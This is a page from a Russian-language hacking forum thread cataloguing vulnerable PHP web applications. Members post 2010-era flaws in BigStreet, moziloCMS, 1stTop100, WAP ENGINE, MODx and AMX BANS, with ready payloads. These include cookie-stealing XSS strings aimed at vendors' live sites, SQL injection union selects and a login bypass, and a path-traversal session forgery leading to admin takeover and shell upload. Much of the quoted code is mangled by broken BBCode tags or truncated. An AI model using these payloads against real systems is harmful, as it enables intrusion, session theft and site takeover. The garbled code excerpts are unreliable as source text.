HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Энциклопедия уязвимых скриптов
   
Ответ
Страница 41 из 52 « Первая < 31 37 38 39 40 41 42 43 44 45 51 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.07.2010, 13:47
emillord
Участник форума
Регистрация: 20.01.2008
Сообщений: 284
Провел на форуме:
3767223

Репутация: 408
Отправить сообщение для emillord с помощью ICQ
По умолчанию
BigStreet alpha RC1

(07.10.2010)

BigStreet CMS — система для создания сообществ.

Искать в гугле по запросу

Код:
Code:
Powered by BigStreet
XSS

Передаём в GET

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site/system/tools/yaca.parser.php?url=1alert(1).[/COLOR][/COLOR] 
Сайт автора:

Цитата:
Сообщение от None  
http://www.bigstreet.ru/system/tools/yaca.parser.php?url=1%3Cscript%3Ealert%281%29%3C/script%3E.
Недостаточная фильтрация входящих данных.

PHP код:
PHP:
[COLOR="#000000"][/COLOR]" style="width: 500px">

$text = file_get_contents($first_url);

$text = iconv('windows-1251', 'utf-8', $text);

preg_match_all("/\d+/isU", $text, $matches);

$text = file_get_contents($url);

$text = iconv('windows-1251', 'utf-8', $text);

preg_match_all("/([\d\w\.\-]*)/isU", $text, $matches);

[/COLOR] 
XSS passive:

При вводе логина пароля

Цитата:
Сообщение от None  
1alert(407747180852).
Страница http://site/feedback/

Уязвимо поле: Спросите, пожелайте, возмутитесь

Отправляем пост запрос с таким содержимым

alert()
 
Ответить с цитированием

  #2  
Старый 08.08.2010, 18:19
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию
4images 1.7.7

Раскрытие путей:

/categories.php?cat_id=2&page=-2

Код:
Code:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/site/includes/db_mysql.php on line 116
 
Ответить с цитированием

  #3  
Старый 09.08.2010, 00:12
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию
moziloCMS 1.0 - 1.1

XSS

/galerie.php

[PHP]
PHP:
[COLOR="#000000"]else {

$allindexes= array();

for($i=1;$i[COLOR="#007700"]alert(document.cookie)

[/QUOTE]
" if author else f"
Цитата:
/galerie.php?cat=10_Willkommen&index=1">alert(docum ent.cookie)
1.12.Beta 3 (Последняя версия)

XSS

Оф Сайт:

Цитата:
Сообщение от None  
http://cms.mozilo.de/index.php?action=search&query=a">alert('XSS')&acti on.x=10&action.y=8&action=search
 
Ответить с цитированием

  #4  
Старый 15.08.2010, 20:02
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию
[SIZE="3"][COLOR="Green"]1stTop100

->edit.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"submit"[/COLOR][COLOR="#007700"]] AND ![/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"edit"[/COLOR][COLOR="#007700"]]){

[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"pass"[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM top_[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#DD0000"]WHERE memberid = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"id"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"' AND password = '[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#DD0000"]"Невозможно подключиться к mysql"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

...

...

...

[/COLOR][/COLOR
Expl:

Код:
Code:
POST
memberid=1' --
->out.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM top_[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#DD0000"]WHERE memberid = '[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#DD0000"]"Невозможно подключиться к MySQL"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"dmY"[/COLOR][COLOR="#007700"]);

while([/COLOR][COLOR="#0000BB"]$object[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]$today[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$object[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]hitstoday[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$today[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" | "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$today[/COLOR][COLOR="#007700"]);

...

...

...

[/COLOR][/COLOR
При register_globals = ON и magic_quotes_gpc = OFF

Expl:

Код:
Code:
$_GET['id'] = 1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
 
Ответить с цитированием

  #5  
Старый 16.08.2010, 02:42
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию
WAP ENGINE 5.0

_http://wap-engine.ru/

Reverse-IP:

Нужен шелл на соседнем сайте.

->templates/run.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]]))

 {

 if([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'SCRIPT_NAME'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'modules'[/COLOR][COLOR="#007700"]))

 {

[/COLOR][COLOR="#0000BB"]$user_data_file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"../../data/users/[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"].php"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$user_f[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$user_data_file[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

 }

 else

{

[/COLOR][COLOR="#0000BB"]$user_data_file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"data/users/[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"].php"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$user_f[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$user_data_file[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

}

[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_f[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_f[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$passw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_f[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]]);

...

...

...

[/COLOR][/COLOR
->Получение админских прав.

Expl:

Заливаем в /tmp .php файл, с таким содержанием и называем его oleg

Код:
Code:
Далее создаём файл сессии в той же папки

Код:
Code:
traf|i:140459;rand|s:4:"6523";login|s:16:"../../../../oleg";pass|s:32:"fb469d7ef430b0baf0cab6c436e70375";
ЗЫ:Не забываем выставлять права.

->Заливаем шелл

В админ панели заходим в редактор страниц-> Вставляем следующий код

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR
 
Ответить с цитированием

  #6  
Старый 17.08.2010, 04:02
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию
MODx Evolution CMS

Version 1.0.1 (скачать: http://modxcms.com/download/rc/MODx-1.0.1-rc-1.tar.gz )

XSS (нужны права админа)

\manager\includes\accesscontrol.inc.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$itemid[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$lasthittime[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]'1'[/COLOR][COLOR="#007700"];

 if([/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]'1'[/COLOR][COLOR="#007700"]) {

 if (![/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$itemid[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]$itemid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sprintf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'REPLACE INTO %s (internalKey, username, lasthit, action, id, ip)

VALUES (%d, \'%s\', \'%d\', \'%s\', %s, \'%s\')'[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#0000BB"]$modx[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getFullTableName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'active_users'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#FF8000"]// Table

[/COLOR][COLOR="#0000BB"]$modx[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getLoginUserID[/COLOR][COLOR="#007700"](),

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mgrShortname'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#0000BB"]$lasthittime[/COLOR][COLOR="#007700"],

 (string)[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#0000BB"]var_export[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$itemid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]),

[/COLOR][COLOR="#0000BB"]$ip[/COLOR][/COLOR
Result:

http://localhost/modx-1.0.1-rc-1/manager/index.php?a=2'>alert(010101)

+

XSS на Оф Сайте:

http://modxcms.com/searchresults.html

Вписываем:

">alert(document.cookie)​
 
Ответить с цитированием

  #7  
Старый 17.08.2010, 21:19
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию
[SIZE="3"][COLOR="Green"]AMX BANS 6.0.0

в куки

Код:
Code:
amxbans:' union select 1,0x27,1,4 -- :1233
->accsess.php.inc

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT id,username,level,email FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_webadmins` WHERE logcode='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' LIMIT 1"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

 if([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {

 while([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uid"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uname"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"email"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]email[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"level"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]level[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"sid"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]session_id[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"loggedin"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];

}

[/COLOR][/COLOR
->modul_iexport.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$reason[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$plnick[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"])!=[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"_NOREQUIREDFIELDS"[/COLOR][COLOR="#007700"];

} else {

[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]=(int)[/COLOR][COLOR="#0000BB"]strtotime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'filename'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$types[/COLOR][COLOR="#007700"]=array([/COLOR][COLOR="#DD0000"]"cfg"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"txt"[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"_FILENOFILE"[/COLOR][COLOR="#007700"];

} else {

[/COLOR][COLOR="#0000BB"]$file_type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]strrchr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);

if(![/COLOR][COLOR="#0000BB"]in_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file_type[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$types[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"_FILETYPENOTALLOWED"[/COLOR][COLOR="#007700"];

}

if([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'filename'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'size'[/COLOR][COLOR="#007700"]] >= ([/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]max_file_size[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]1024[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]1024[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"_FILETOBIG"[/COLOR][COLOR="#007700"];

if(![/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]) {

if(![/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'filename'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"temp/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"_FILEUPLOADFAIL"[/COLOR][COLOR="#007700"];

} else {

[/COLOR][COLOR="#0000BB"]$handle[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"temp/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"r"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"imported"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"failed"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

while (![/COLOR][COLOR="#0000BB"]feof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$handle[/COLOR][COLOR="#007700"]))

{

[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fgets[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$handle[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]128[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$bans[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"]=(int)[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$bans[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#FF8000"]//amxbans 5.x hack, exported banned.cfg with reason

[/COLOR][COLOR="#0000BB"]$reason_real[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

if([/COLOR][COLOR="#0000BB"]$bans[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) {

for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans` WHERE `player_id`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$steamid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND `expired`=0"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

if([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"failed"[/COLOR][COLOR="#007700"]]++; continue;}

[/COLOR][COLOR="#FF8000"]//write ban to db

[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"imported"[/COLOR][COLOR="#007700"]]++;

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans`

(`player_id`,`player_nick`,`admin_nick`,`ban_type`,`ban_reason`,`ban_created`,`ban_length`,`server_name`,`imported`) VALUES

('"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$steamid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$plnick[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uname"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"','S','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$reason_real[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"',"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]","[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]",'"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"',1)"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

}else if([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$bans[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]])==[/COLOR][COLOR="#DD0000"]"banip"[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#FF8000"]//ban with ip

